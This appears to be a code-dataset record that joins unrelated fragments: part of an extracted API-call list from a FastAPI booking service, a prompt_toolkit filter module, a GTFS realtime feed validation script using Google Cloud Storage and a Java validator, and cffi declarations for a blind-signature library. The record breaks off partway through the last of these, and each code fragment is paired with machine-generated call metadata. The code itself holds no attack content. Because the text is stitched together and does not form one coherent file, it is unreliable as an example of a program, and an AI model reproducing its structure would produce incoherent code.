fastapi import FastAPI, Form, 
HTTPException, Request\n'), ((4224, 4234), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4228, 4234), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4275, 4285), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4279, 4285), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4329, 4339), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4333, 4339), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4368, 4378), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4372, 4378), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4407, 4417), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4411, 4417), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4451, 4461), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4455, 4461), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4493, 4503), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4497, 4503), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4939, 4955), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (4953, 4955), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((4978, 4993), 'hipotap_common.proto_messages.offer_pb2.OfferFilterPB', 'OfferFilterPB', ([], {}), '()\n', (4991, 4993), False, 'from hipotap_common.proto_messages.offer_pb2 import OfferFilterPB\n'), ((6467, 6582), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (6492, 6582), False, 'from google.protobuf import json_format\n'), ((6703, 6712), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6707, 6712), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6740, 6749), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6744, 6749), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6774, 6783), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6778, 6783), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6811, 6820), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6815, 6820), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6845, 6861), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (6859, 6861), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((6885, 6901), 'hipotap_common.proto_messages.order_pb2.OrderRequestPB', 'OrderRequestPB', ([], {}), '()\n', (6899, 6901), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((7665, 7674), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (7669, 7674), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((7697, 7713), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (7711, 7713), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((7742, 7762), 'hipotap_common.proto_messages.order_pb2.OrderListRequestPB', 'OrderListRequestPB', ([], {}), '()\n', (7760, 7762), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, 
OrderRequestPB, OrderListRequestPB\n'), ((7903, 8018), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (7928, 8018), False, 'from google.protobuf import json_format\n'), ((8117, 8126), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8121, 8126), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8149, 8165), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (8163, 8165), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((8193, 8212), 'hipotap_common.proto_messages.order_pb2.GetOrderRequestPB', 'GetOrderRequestPB', ([], {}), '()\n', (8210, 8212), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((8329, 8439), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (8354, 8439), False, 'from google.protobuf import json_format\n'), ((8552, 8561), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8556, 8561), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8586, 8595), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8590, 8595), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8616, 8625), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8620, 8625), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8650, 8666), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (8664, 8666), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((8697, 8720), 'hipotap_common.proto_messages.order_pb2.OrderPaymentRequestPB', 'OrderPaymentRequestPB', ([], {}), '()\n', (8718, 8720), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((9505, 9547), 'hipotap_common.rpc.clients.events_fanout_client.EventFanoutClient', 'EventFanoutClient', (['event_queue', 'event_type'], {}), '(event_queue, event_type)\n', (9522, 9547), False, 'from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient\n'), ((12399, 12415), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (12413, 12415), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((12478, 12589), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['trends_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(trends_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (12503, 12589), False, 'from google.protobuf import json_format\n'), ((2294, 2312), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2310, 2312), False, 'import sys\n'), ((2484, 2544), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Invalid credentials"""'}), "(status_code=401, detail='Invalid credentials')\n", (2497, 2544), False, 'from fastapi import FastAPI, Form, HTTPException, 
Request\n'), ((3252, 3270), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3268, 3270), False, 'import sys\n'), ((3327, 3382), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Email is taken"""'}), "(status_code=401, detail='Email is taken')\n", (3340, 3382), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((7275, 7284), 'hipotap_common.proto_messages.order_pb2.OrderPB', 'OrderPB', ([], {}), '()\n', (7282, 7284), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((7348, 7458), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (7373, 7458), False, 'from google.protobuf import json_format\n'), ((7526, 7585), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Cannot order offer"""'}), "(status_code=401, detail='Cannot order offer')\n", (7539, 7585), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((9121, 9178), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Cannot pay order"""'}), "(status_code=401, detail='Cannot pay order')\n", (9134, 9178), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((9905, 9912), 'queue.Queue', 'Queue', ([], {}), '()\n', (9910, 9912), False, 'from queue import Queue\n'), ((9945, 10004), 'threading.Thread', 'Thread', ([], {'target': 'event_receiving', 'args': "(event_queue, 'offer')"}), "(target=event_receiving, args=(event_queue, 'offer'))\n", (9951, 10004), False, 'from threading import Thread\n'), ((11251, 11258), 'queue.Queue', 'Queue', ([], {}), '()\n', (11256, 11258), False, 'from queue import Queue\n'), ((11291, 11350), 'threading.Thread', 'Thread', ([], {'target': 'event_receiving', 'args': "(event_queue, 'order')"}), "(target=event_receiving, args=(event_queue, 'order'))\n", (11297, 11350), False, 'from threading import Thread\n'), ((6200, 6250), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_start', '"""%Y-%m-%d"""'], {}), "(date_start, '%Y-%m-%d')\n", (6226, 6250), False, 'import datetime\n'), ((6335, 6383), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_end', '"""%Y-%m-%d"""'], {}), "(date_end, '%Y-%m-%d')\n", (6361, 6383), False, 'import datetime\n'), ((10703, 10738), 'asyncio.sleep', 'asyncio.sleep', (['MESSAGE_STREAM_DELAY'], {}), '(MESSAGE_STREAM_DELAY)\n', (10716, 10738), False, 'import asyncio\n'), ((12049, 12084), 'asyncio.sleep', 'asyncio.sleep', (['MESSAGE_STREAM_DELAY'], {}), '(MESSAGE_STREAM_DELAY)\n', (12062, 12084), False, 'import asyncio\n')]
|
from __future__ import unicode_literals
from inspect import ArgSpec
from six import with_metaclass
__all__ = (
'CLIFilter',
'SimpleFilter',
'check_signatures_are_equal',
)
class _FilterTypeMeta(type):
def __instancecheck__(cls, instance):
if not hasattr(instance, 'getargspec'):
return False
arguments = _drop_self(instance.getargspec())
return arguments.args == cls.arguments_list or arguments.varargs is not None
class _FilterType(with_metaclass(_FilterTypeMeta)):
def __new__(cls):
        raise NotImplementedError('This class should not be instantiated.')
class CLIFilter(_FilterType):
"""
Abstract base class for filters that accept a
:class:`~prompt_toolkit.interface.CommandLineInterface` argument. It cannot
be instantiated, it's only to be used for instance assertions, e.g.::
        isinstance(my_filter, CLIFilter)
"""
arguments_list = ['cli']
class SimpleFilter(_FilterType):
"""
Abstract base class for filters that don't accept any arguments.
"""
arguments_list = []
def _drop_self(spec):
"""
Take an argspec and return a new one without the 'self'.
"""
args, varargs, varkw, defaults = spec
if args[0:1] == ['self']:
args = args[1:]
return ArgSpec(args, varargs, varkw, defaults)
def check_signatures_are_equal(lst):
"""
Check whether all filters in this list have the same signature.
Raises `TypeError` if not.
"""
spec = _drop_self(lst[0].getargspec())
for f in lst[1:]:
if _drop_self(f.getargspec()) != spec:
raise TypeError('Trying to chain filters with different signature: %r and %r' %
(lst[0], f))
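# Illustrative instance check (the HasFocus class below is hypothetical, not
# part of this module): any object whose getargspec() matches a class's
# arguments_list passes the metaclass's __instancecheck__.
#
#   class HasFocus(object):
#       def getargspec(self):
#           return ArgSpec(args=['self', 'cli'], varargs=None, keywords=None, defaults=None)
#
#   assert isinstance(HasFocus(), CLIFilter)         # ['cli'] matches
#   assert not isinstance(HasFocus(), SimpleFilter)  # SimpleFilter expects []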
|
[
"inspect.ArgSpec",
"six.with_metaclass"
] |
[((490, 521), 'six.with_metaclass', 'with_metaclass', (['_FilterTypeMeta'], {}), '(_FilterTypeMeta)\n', (504, 521), False, 'from six import with_metaclass\n'), ((1294, 1333), 'inspect.ArgSpec', 'ArgSpec', (['args', 'varargs', 'varkw', 'defaults'], {}), '(args, varargs, varkw, defaults)\n', (1301, 1333), False, 'from inspect import ArgSpec\n')]
|
__version__ = "0.0.1"
import os
import json
import subprocess
import shutil
import pandas as pd
import argh
from tempfile import TemporaryDirectory, NamedTemporaryFile
from pathlib import Path
from collections import defaultdict
RT_BUCKET_FOLDER="gs://gtfs-data/rt"
RT_BUCKET_PROCESSED_FOLDER="gs://gtfs-data/rt-processed"
SCHEDULE_BUCKET_FOLDER="gs://gtfs-data/schedule"
# Note that the final {extraction_date} is needed by the validator, which may read it as
# timestamp data. Note that the final datetime requires Z at the end, to indicate
# it's an ISO instant.
RT_FILENAME_TEMPLATE="{extraction_date}__{itp_id}__{url_number}__{src_fname}__{extraction_date}Z.pb"
N_THREAD_WORKERS = 30
try:
JAR_PATH = os.environ["GTFS_VALIDATOR_JAR"]
except KeyError:
raise Exception("Must set the environment variable GTFS_VALIDATOR_JAR")
# Utility funcs ----
def json_to_newline_delimited(in_file, out_file):
    with open(in_file) as f_in:
        data = json.load(f_in)
with open(out_file, "w") as f:
f.write("\n".join([json.dumps(record) for record in data]))
def parse_pb_name_data(file_name):
"""Returns data encoded in extraction files, such as datetime or itp id.
>>> parse_pb_name_data("2021-01-01__1__0__filename__etc")
{'extraction_date': '2021-01-01', 'itp_id': 1, 'url_number': 0, 'src_fname': 'filename'}
"""
extraction_date, itp_id, url_number, src_fname, *_ = Path(file_name).name.split("__")
return dict(
extraction_date = extraction_date,
itp_id = int(itp_id),
url_number = int(url_number),
src_fname = src_fname)
def build_pb_validator_name(extraction_date, itp_id, url_number, src_fname):
"""Return name for file in the format needed for validation.
Note that the RT validator needs to use timestamps at the end of the filename,
so this function ensures they are present.
"""
return RT_FILENAME_TEMPLATE.format(
extraction_date=extraction_date,
itp_id=itp_id,
url_number=url_number,
src_fname=src_fname
)
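# Round-trip sketch: parse_pb_name_data() recovers exactly the fields that
# build_pb_validator_name() encodes (the file name below is illustrative):
#
#   >>> fields = parse_pb_name_data("2021-01-01__1__0__trip_updates__x")
#   >>> build_pb_validator_name(**fields)
#   '2021-01-01__1__0__trip_updates__2021-01-01Z.pb'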
# Validation ==================================================================
def gather_results(rt_path):
# TODO: complete functionality to unpack results into a DataFrame
# Path(rt_path).glob("*.results.json")
raise NotImplementedError()
def validate(gtfs_file, rt_path, verbose=False):
if not isinstance(gtfs_file, str):
raise NotImplementedError("gtfs_file must be a string")
stderr = subprocess.DEVNULL if not verbose else None
stdout = subprocess.DEVNULL if not verbose else None
subprocess.check_call([
"java",
"-jar", JAR_PATH,
"-gtfs", gtfs_file,
"-gtfsRealtimePath", rt_path,
"-sort", "name",
], stderr=stderr, stdout=stdout)
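# Example invocation (paths are illustrative):
#
#   validate("data/gtfs_schedule.zip", "data/rt", verbose=True)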
def validate_gcs_bucket(
project_id, token, gtfs_schedule_path, gtfs_rt_glob_path=None,
out_dir=None, results_bucket=None, verbose=False, aggregate_counts=False,
):
"""
Fetch and validate GTFS RT data held in a google cloud bucket.
Parameters:
project_id: name of google cloud project.
token: token argument passed to gcsfs.GCSFileSystem.
gtfs_schedule_path: path to a folder holding unpacked GTFS schedule data.
gtfs_rt_glob_path: path that GCSFileSystem.glob can uses to list all RT files.
Note that this is assumed to have the form {datetime}/{itp_id}/{url_number}/filename.
out_dir: a directory to store fetched files and results in.
results_bucket: a bucket path to copy results to.
verbose: whether to print helpful messages along the way.
Note that if out_dir is unspecified, the validation occurs in a temporary directory.
"""
import gcsfs
fs = gcsfs.GCSFileSystem(project_id, token=token)
if not out_dir:
tmp_dir = TemporaryDirectory()
tmp_dir_name = tmp_dir.name
else:
tmp_dir = None
tmp_dir_name = out_dir
    if results_bucket and not aggregate_counts and not results_bucket.endswith("/"):
        results_bucket = f"{results_bucket}/"
final_json_dir = Path(tmp_dir_name) / "newline_json"
try:
print("Fetching data")
dst_path_gtfs = f"{tmp_dir_name}/gtfs"
dst_path_rt = f"{tmp_dir_name}/rt"
# fetch and zip gtfs schedule
download_gtfs_schedule_zip(gtfs_schedule_path, dst_path_gtfs, fs)
# fetch rt data
if gtfs_rt_glob_path is None:
raise ValueError("One of gtfs rt glob path or date must be specified")
download_rt_files(dst_path_rt, fs, glob_path = gtfs_rt_glob_path)
print("Validating data")
validate(f"{dst_path_gtfs}.zip", dst_path_rt, verbose=verbose)
if results_bucket and aggregate_counts:
print(f"Saving aggregate counts as: {results_bucket}")
error_counts = rollup_error_counts(dst_path_rt)
df = pd.DataFrame(error_counts)
with NamedTemporaryFile() as tmp_file:
df.to_parquet(tmp_file.name)
fs.put(tmp_file.name, results_bucket)
elif results_bucket and not aggregate_counts:
# validator stores results as {filename}.results.json
print(f"Putting data into results bucket: {results_bucket}")
# fetch all results files created by the validator
all_results = list(Path(dst_path_rt).glob("*.results.json"))
final_json_dir.mkdir(exist_ok=True)
final_files = []
for result in all_results:
# we appended a final timestamp to the files so that the validator
# can use it to order them during validation. here, we remove that
# timestamp, so we can use a single wildcard to select, eg..
# *trip_updates.results.json
result_out = "__".join(result.name.split("__")[:-1])
json_to_newline_delimited(result, final_json_dir / result_out)
final_files.append(final_json_dir / result_out)
fs.put(final_files, results_bucket)
except Exception as e:
raise e
finally:
if isinstance(tmp_dir, TemporaryDirectory):
tmp_dir.cleanup()
def validate_gcs_bucket_many(
project_id, token, param_csv,
results_bucket=None, verbose=False, aggregate_counts=False,
status_result_path=None, strict=False, result_name_prefix="result_"
):
"""Validate many gcs buckets using a parameter file.
Additional Arguments:
strict: whether to raise an error when a validation fails
status_result_path: directory for saving the status of validations
        result_name_prefix: a prefix for each result file name. File names
            will be numbered, e.g. result_0.parquet, result_1.parquet for two feeds.
    Param CSV should contain the following fields (passed to validate_gcs_bucket):
        * gtfs_schedule_path
        * gtfs_rt_glob_path
    The full parameters CSV is dumped to newline-delimited JSON with an additional
    column called is_success, which reports whether or not the validation succeeded.
    """
import gcsfs
required_cols = ["gtfs_schedule_path", "gtfs_rt_glob_path"]
fs = gcsfs.GCSFileSystem(project_id, token=token)
params = pd.read_csv(fs.open(param_csv))
# check that the parameters file has all required columns
missing_cols = set(required_cols) - set(params.columns)
if missing_cols:
raise ValueError("parameter csv missing columns: %s" % missing_cols)
status = []
for idx, row in params.iterrows():
try:
validate_gcs_bucket(
project_id,
token,
results_bucket=results_bucket + f"/{result_name_prefix}{idx}.parquet",
verbose=verbose,
aggregate_counts=aggregate_counts,
**row[required_cols]
)
status.append({**row, "is_success": True})
except Exception as e:
if strict:
raise e
status.append({**row, "is_success": False})
status_newline_json = "\n".join([json.dumps(record) for record in status])
if status_result_path:
fs.pipe(status_result_path, status_newline_json.encode())
def download_gtfs_schedule_zip(gtfs_schedule_path, dst_path, fs):
# fetch and zip gtfs schedule
fs.get(gtfs_schedule_path, dst_path, recursive=True)
shutil.make_archive(dst_path, "zip", dst_path)
def download_rt_files(dst_dir, fs=None, date="2021-08-01", glob_path=None):
"""Download all files for an GTFS RT feed (or multiple feeds)
If date is specified, downloads daily data for all feeds. Otherwise, if
glob_path is specified, downloads data for a single feed.
Parameters:
date: date of desired feeds to download data from (e.g. 2021-09-01)
glob_path: if specified, the path (including a wildcard) for downloading a
single feed.
"""
if fs is None:
raise NotImplementedError("Must specify fs")
# {date}T{timestamp}/{itp_id}/{url_number}
all_files = fs.glob(glob_path) if glob_path else fs.glob(f"{RT_BUCKET_FOLDER}/{date}*/*/*/*")
to_copy = []
    out_feeds = defaultdict(list)
for src_path in all_files:
dt, itp_id, url_number, src_fname = src_path.split("/")[-4:]
if glob_path:
dst_parent = Path(dst_dir)
else:
# if we are downloading multiple feeds, make each feed a subdir
dst_parent = Path(dst_dir) / itp_id / url_number
dst_parent.mkdir(parents=True, exist_ok=True)
out_fname = build_pb_validator_name(dt, itp_id, url_number, src_fname)
dst_name = str(dst_parent / out_fname)
to_copy.append([src_path, dst_name])
out_feeds[(itp_id, url_number)].append(dst_name)
print(f"Copying {len(to_copy)} files")
src_files, dst_files = zip(*to_copy)
fs.get(list(src_files), list(dst_files))
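# Example invocations (project name and paths are illustrative):
#
#   fs = gcsfs.GCSFileSystem("my-project", token="cloud")
#   download_rt_files("/tmp/rt", fs=fs, date="2021-09-01")   # every feed for one day
#   download_rt_files("/tmp/rt", fs=fs,
#                     glob_path=f"{RT_BUCKET_FOLDER}/2021-09-01*/1/0/*")  # one feed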
# Rectangling =================================================================
def rollup_error_counts(rt_dir):
result_files = Path(rt_dir).glob("*.results.json")
code_counts = []
for path in result_files:
metadata = parse_pb_name_data(path)
result_json = json.load(path.open())
for entry in result_json:
code_counts.append({
"calitp_itp_id": metadata["itp_id"],
"calitp_url_number": metadata["url_number"],
"calitp_extracted_at": metadata["extraction_date"],
"rt_feed_type": metadata["src_fname"],
"error_id": entry["errorMessage"]["validationRule"]["errorId"],
"n_occurrences": len(entry["occurrenceList"])
})
return code_counts
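# The per-record output above aggregates naturally with pandas, e.g. total
# occurrences per error code (a sketch; the directory path is illustrative):
#
#   df = pd.DataFrame(rollup_error_counts("/tmp/rt"))
#   totals = df.groupby("error_id")["n_occurrences"].sum()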
# Main ========================================================================
def main():
# TODO: make into simple CLI
result = argh.dispatch_commands([
validate, validate_gcs_bucket
])
if result is not None:
print(json.dumps(result))
if __name__ == "__main__":
main()
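# CLI sketch (module name is illustrative; argh exposes each listed function as
# a subcommand - depending on the argh version the name keeps underscores or
# maps them to dashes):
#
#   python validator.py validate data/gtfs_schedule.zip data/rt
#   python validator.py validate-gcs-bucket my-project cloud gs://bucket/schedule ...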
|
[
"pandas.DataFrame",
"tempfile.NamedTemporaryFile",
"tempfile.TemporaryDirectory",
"shutil.make_archive",
"argh.dispatch_commands",
"json.dumps",
"collections.defaultdict",
"pathlib.Path",
"gcsfs.GCSFileSystem",
"subprocess.check_call"
] |
[((2582, 2737), 'subprocess.check_call', 'subprocess.check_call', (["['java', '-jar', JAR_PATH, '-gtfs', gtfs_file, '-gtfsRealtimePath', rt_path,\n '-sort', 'name']"], {'stderr': 'stderr', 'stdout': 'stdout'}), "(['java', '-jar', JAR_PATH, '-gtfs', gtfs_file,\n '-gtfsRealtimePath', rt_path, '-sort', 'name'], stderr=stderr, stdout=\n stdout)\n", (2603, 2737), False, 'import subprocess\n'), ((3768, 3812), 'gcsfs.GCSFileSystem', 'gcsfs.GCSFileSystem', (['project_id'], {'token': 'token'}), '(project_id, token=token)\n', (3787, 3812), False, 'import gcsfs\n'), ((7273, 7317), 'gcsfs.GCSFileSystem', 'gcsfs.GCSFileSystem', (['project_id'], {'token': 'token'}), '(project_id, token=token)\n', (7292, 7317), False, 'import gcsfs\n'), ((8492, 8538), 'shutil.make_archive', 'shutil.make_archive', (['dst_path', '"""zip"""', 'dst_path'], {}), "(dst_path, 'zip', dst_path)\n", (8511, 8538), False, 'import shutil\n'), ((9296, 9320), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (9307, 9320), False, 'from collections import defaultdict\n'), ((10989, 11044), 'argh.dispatch_commands', 'argh.dispatch_commands', (['[validate, validate_gcs_bucket]'], {}), '([validate, validate_gcs_bucket])\n', (11011, 11044), False, 'import argh\n'), ((3852, 3872), 'tempfile.TemporaryDirectory', 'TemporaryDirectory', ([], {}), '()\n', (3870, 3872), False, 'from tempfile import TemporaryDirectory, NamedTemporaryFile\n'), ((4123, 4141), 'pathlib.Path', 'Path', (['tmp_dir_name'], {}), '(tmp_dir_name)\n', (4127, 4141), False, 'from pathlib import Path\n'), ((4924, 4950), 'pandas.DataFrame', 'pd.DataFrame', (['error_counts'], {}), '(error_counts)\n', (4936, 4950), True, 'import pandas as pd\n'), ((8192, 8210), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (8202, 8210), False, 'import json\n'), ((9467, 9480), 'pathlib.Path', 'Path', (['dst_dir'], {}), '(dst_dir)\n', (9471, 9480), False, 'from pathlib import Path\n'), ((10185, 10197), 'pathlib.Path', 'Path', (['rt_dir'], {}), '(rt_dir)\n', (10189, 10197), False, 'from pathlib import Path\n'), ((11105, 11123), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (11115, 11123), False, 'import json\n'), ((1389, 1404), 'pathlib.Path', 'Path', (['file_name'], {}), '(file_name)\n', (1393, 1404), False, 'from pathlib import Path\n'), ((4969, 4989), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {}), '()\n', (4987, 4989), False, 'from tempfile import TemporaryDirectory, NamedTemporaryFile\n'), ((1011, 1029), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (1021, 1029), False, 'import json\n'), ((9596, 9609), 'pathlib.Path', 'Path', (['dst_dir'], {}), '(dst_dir)\n', (9600, 9609), False, 'from pathlib import Path\n'), ((5391, 5408), 'pathlib.Path', 'Path', (['dst_path_rt'], {}), '(dst_path_rt)\n', (5395, 5408), False, 'from pathlib import Path\n')]
|
# file "blindsig_build.py"
from pygroupsig.common_build import ffibuilder
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
void *sig;
} groupsig_blindsig_t;
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
typedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
groupsig_blindsig_init_f init;
groupsig_blindsig_free_f free;
groupsig_blindsig_copy_f copy;
groupsig_blindsig_get_size_f get_size;
groupsig_blindsig_export_f gexport;
groupsig_blindsig_import_f gimport;
groupsig_blindsig_to_string_f to_string;
} groupsig_blindsig_handle_t;
""")
ffibuilder.cdef("""
const groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);
""")
ffibuilder.cdef("""
int groupsig_blindsig_free(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
int groupsig_blindsig_get_size(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_export(
unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_import(
uint8_t code,
unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
char* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);
""")
|
[
"pygroupsig.common_build.ffibuilder.cdef"
] |
[((76, 172), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef struct {\nuint8_t scheme;\nvoid *sig;\n} groupsig_blindsig_t;\n"""'], {}), '(\n """\ntypedef struct {\nuint8_t scheme;\nvoid *sig;\n} groupsig_blindsig_t;\n""")\n', (91, 172), False, 'from pygroupsig.common_build import ffibuilder\n'), ((169, 262), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);\n"""'], {}), '(\n """\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);\n""")\n', (184, 262), False, 'from pygroupsig.common_build import ffibuilder\n'), ((259, 365), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);\n"""\n )\n', (274, 365), False, 'from pygroupsig.common_build import ffibuilder\n'), ((357, 484), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""\n )\n', (372, 484), False, 'from pygroupsig.common_build import ffibuilder\n'), ((476, 581), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);\n"""\n )\n', (491, 581), False, 'from pygroupsig.common_build import ffibuilder\n'), ((573, 804), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,\n uint32_t *size,\n groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,\n uint32_t *size,\n groupsig_blindsig_t *blindsig);\n"""\n )\n', (588, 804), False, 'from pygroupsig.common_build import ffibuilder\n'), ((796, 938), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,\n\t\t\t\t\t\t\t uint32_t size);\n"""'], {}), '(\n """\ntypedef 